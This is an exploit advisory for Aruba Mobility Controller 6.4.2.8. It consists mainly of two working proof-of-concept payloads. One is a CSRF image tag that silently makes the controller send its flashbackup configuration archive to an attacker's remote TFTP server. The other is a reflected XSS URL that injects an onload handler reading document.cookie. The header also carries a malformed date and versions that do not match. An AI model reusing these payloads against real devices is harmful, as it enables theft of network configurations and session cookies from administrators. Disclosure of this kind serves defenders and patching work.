33 lines
No EOL
970 B
Text
33 lines
No EOL
970 B
Text
# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
|
|
# Date: 08/016/2015
|
|
# Author: Itzik Chen
|
|
# Product web page: http://www.arubanetworks.com
|
|
# Affected Version: 6.4.2.8
|
|
# Tested on: Aruba7240, Ver 6.2.4.8
|
|
|
|
|
|
|
|
Summary
|
|
================
|
|
|
|
Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
|
|
Arube Controller suffers from CSRF and XSS vulnerabilities.
|
|
|
|
|
|
|
|
Proof of Concept - CSRF
|
|
=========================
|
|
|
|
192.168.0.1 - Controller IP-Address
|
|
172.17.0.1 - Remote TFTP server
|
|
|
|
<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">
|
|
|
|
That will send the flashbackup configuration file to a remote TFTP server.
|
|
|
|
|
|
|
|
Proof of Concept - XSS
|
|
=========================
|
|
|
|
https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)> |